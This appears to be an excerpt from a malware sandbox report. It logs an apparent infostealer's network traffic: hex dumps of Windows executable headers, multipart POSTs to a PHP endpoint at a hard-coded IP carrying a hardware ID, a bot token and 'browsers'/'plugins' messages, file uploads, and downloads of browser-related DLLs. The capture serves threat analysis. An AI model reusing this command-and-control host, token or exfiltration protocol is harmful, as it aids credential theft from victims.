5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:06 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:07 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:07 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 23.88.106.134Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 31 39 36 30 37 37 37 34 43 43 36 36 31 31 37 39 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 75 61 70 66 73 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGHHost: 23.88.106.134Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="message"browsers------HDGHJEBFBFHIIECAECGH--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 23.88.106.134Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"plugins------HCAFIJDGHCBFHJKFCGIE--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 23.88.106.134Content-Length: 6767Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFBHost: 23.88.106.134Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file"------EGIDBFBFHJDGCAKEGHJE--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/nss3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
